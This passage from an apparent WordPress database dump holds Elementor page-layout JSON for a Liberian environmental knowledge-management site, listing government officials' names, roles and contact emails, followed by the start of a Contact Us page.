\\/>jcammue@epa.gov.lr<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"05d0b76\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"821b474\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Benjamin Karmorh<\\/strong><br \\/>MEAs Coordinator\\/UNFCCC Focal Point<br \\/>bkarmorh@epa.gov.lr<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2f49cdd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"77354cc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Berexford S. Jallah<\\/strong><br \\/>GIS Coordinator\\/UNCCD Focal Point<br \\/>bjallah@epa.gov.lr<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73bdb81\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"6710f3e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f9614d7\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/so.jpg\",\"id\":3324}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"84a6f95\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d88ffbf\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_JJ.jpg\",\"id\":2365},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/john-k-jallah\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"391549e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4c9c6f3\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"\",\"id\":\"\"},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/kawusu-toure\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\",\"caption_typography_typography\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4093e35\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"b1acda1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4adfd45\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Jeremiah Sokan Sr<\\/strong><br \\/>Coordinator Climate Change Secretariat, EPA<br \\/><a href=\\\"mailto:jsokan@epa.gov.lr\\\">jsokan@epa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"9450b67\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0daecd0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>John K. Jallah<\\/strong><br \\/>Manager - Compliance and Enforcement, EPA<br \\/>jjallah@epa.gov.lr<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1bb41c7\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e4f745b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Kawusu Toure<\\/strong><br \\/>Assistant Manager - Compliance and Enforcement, ESIA, EPA<br \\/>kawumtoure@gmail.com<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"96e03da\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"9b01403\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4031f43\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/kn.png\",\"id\":3330}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"39e22a6\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"7b606ac\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/edward.png\",\"id\":3334}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"29ef7d1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"ddce9f1\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"f5bca22\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a080131\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Konikay Nimely<\\/strong><br \\/>EIA Manager, FDA<br \\/><a href=\\\"mailto:kondema79@gmail.com\\\">kondema79@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"79bfd85\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6a85176\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Edward S. Kamara<\\/strong><br>\\n\\nMarketing and Forest Forecast<br>\\n\\n<a href=\\\"mailto:kamara.ed14@gmail.com\\\">kamara.ed14@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b372794\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"89187ea\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Blamah Goll<\\/strong><br>\\nConservation Manager, FDA<br>\\n<a href=\\\"mailto:blamag@gmail.com\\\">blamag@gmail.com<\\/a><br>\\n<a href=\\\"mailto:blamahg@yahoo.com\\\">blamahg@yahoo.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d3e03bf\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"4d885f8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"32bbf7d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/francis-2.png\",\"id\":3340}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"0137c53\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"058ac29\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"4c547ba\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"2b0ae9e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"62420a0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Francis W. Mwah<\\/strong><\\/p><p>Director, MOA<\\/p><p><a href=\\\"mailto:fwmwah1958@yahoo.com\\\">fwmwah1958@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"33fc46f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9feecd9\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>John Willabo Johnson <\\/strong><br>\\n\\nAssistant Minister, MME<br>\\n\\n<a href=\\\"mailto:john.willabo@yahoo.com\\\">john.willabo@yahoo.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"34117d3\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"fe7894a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Urias Garsinii <\\/strong><br>\\nLand Use Management Manager, LLA<br>\\n<a href=\\\"mailto:ugarsinii@yahoo.com\\\">ugarsinii@yahoo.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"25d00af\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"fc5ff06\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9564f30\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/aw2.jpg\",\"id\":3171},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"20138ff\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"cd79b29\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/WIN_20160609_11_17_46_Pro.jpg\",\"id\":3160},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"d1e4641\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b7fd678\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/AlFreeman.jpg\",\"id\":3183},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"519145f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"8314024\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9c38029\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Aaron S.M. Wesseh<\\/strong><br>\\n\\nManager, CCCD Project<br>\\n\\n<a href=\\\"mailto:bethelapril90@gmail.com\\\">bethelapril90@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0cfcbe5\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"865743e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Jesse Mathies<\\/strong><br \\/>Assistant Director, MOCI<br \\/>Division of Foreign Trade<br \\/><a href=\\\"mailto:jesmathies@gmail.com\\\">jesmathies@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"98255ed\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0322201\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Alphonso Freeman<\\/strong><br \\/>Biosafety Officer, MOCI<br \\/>National Standard Laboratory<br \\/><a href=\\\"mailto:freemanalphonso29@yahoo.com\\\">freemanalphonso29@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2ea0ab9\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c682593\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"dc24385\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"5ae9515\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/1.jpg\",\"id\":3165},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"dbcd9dd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"992774f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"77967dc\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"ae8e0aa\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"2763f7b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"435cd31\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Lasana M. Donzo<\\/strong><br \\/>Coordinator for Standards, MOCI<br \\/>Bureau of Industrial Services<br \\/><a href=\\\"mailto:lasanadonzo@yahoo.com\\\">lasanadonzo@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0a4b126\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f7ea9a8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Mambu Golafale<\\/strong><br \\/>Senior Research Officer, MOCI<br \\/>Division of Knowledge Management &amp; Archive<br \\/><a href=\\\"mailto:mgolafale1@gmail.com\\\">mgolafale1@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b3d1f48\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a9ecf24\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Ahmed Sheriff <\\/strong><br \\/>Director, NaFAA<br \\/>Department of Marine Fisheries and Environment<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"738e0dd\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"6e7b3da\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"e8bed5f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"918d54e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"94412fe\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"74f915b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"e88acc7\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"d32c806\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f40392e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Anthony Yokie<\\/strong><br \\/>Manager, NaFAA<br \\/>Department of Marine Fisheries and Environment<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"23fe33d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ea61b10\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Tonia Boah <\\/strong><br \\/>NaFAA<br \\/>Monitoring, Control, and Surveillance Field Officer <\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"27d77d9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d2a5e3d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Joyce Kumeh<\\/strong><br \\/>NaFAA<br \\/>Small Scale Fisheries Officer<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1f03dc8\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"33e80f1\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"5c25b8f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"b4a2e51\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"e3dd1e8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"ad72733\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"707d444\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"23520fd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a3814ef\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Atty. Stephen B. Lavalah <\\/strong><br \\/>Associate Director, LIMA<br \\/>Department of Marine Environmental Protection<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"18738fa\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6765846\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Nadine Ajamia<\\/strong><br \\/>Policy Officer, LIMA<br \\/>Department of Marine Environmental Protection<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"bd520e9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"7bc5a8c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Henry Y. Kesselly<\\/strong><br \\/>Senior Research Officer, LIMA<br \\/>Department of Marine Environmental Protection<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e860d0b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"f6d0ce0\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"6b97206\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"76384d9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"c4dcbf8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"9d55206\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"8c09b65\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"a0b7d70\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"87f3106\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Konah Kaliku<\\/strong><br \\/>Environmental Inspector, LIMA<br \\/>Department of Marine Environmental Protection<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"ea624a8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"c8f36c4\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(23143,3347,'_wp_attached_file','2021/01/Uriah.png'),(23144,3347,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:700;s:6:\"height\";i:652;s:4:\"file\";s:17:\"2021/01/Uriah.png\";s:5:\"sizes\";a:2:{s:6:\"medium\";a:4:{s:4:\"file\";s:17:\"Uriah-300x279.png\";s:5:\"width\";i:300;s:6:\"height\";i:279;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:17:\"Uriah-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(23145,3348,'_elementor_edit_mode','builder'),(23146,3348,'_elementor_template_type','wp-page'),(23147,3348,'_elementor_version','3.0.16'),(23148,3348,'_wp_page_template','default'),(23149,3348,'_elementor_data','[{\"id\":\"3ded694\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"44216f4\"}]},\"elements\":[{\"id\":\"5d3ff64\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0ba37a2\",\"elType\":\"widget\",\"settings\":{\"title\":\"Contact Us\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0d9a870\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0f9b854\"}]},\"elements\":[{\"id\":\"645d44c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"4b86d64\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Please contact the EKMS Team for further information relating to this website.<br>\\nSend an e-mail to our <a href=\\\"maito:contact@ekmsliberia.info\\\">Helpdesk<\\/a> or fill out the contact form below:<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"94083b6\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"494ae8d\"}]},\"elements\":[{\"id\":\"2544493\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"space_between_widgets\":-23},\"elements\":[{\"id\":\"92e0be0\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"ca88780\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[everest_form 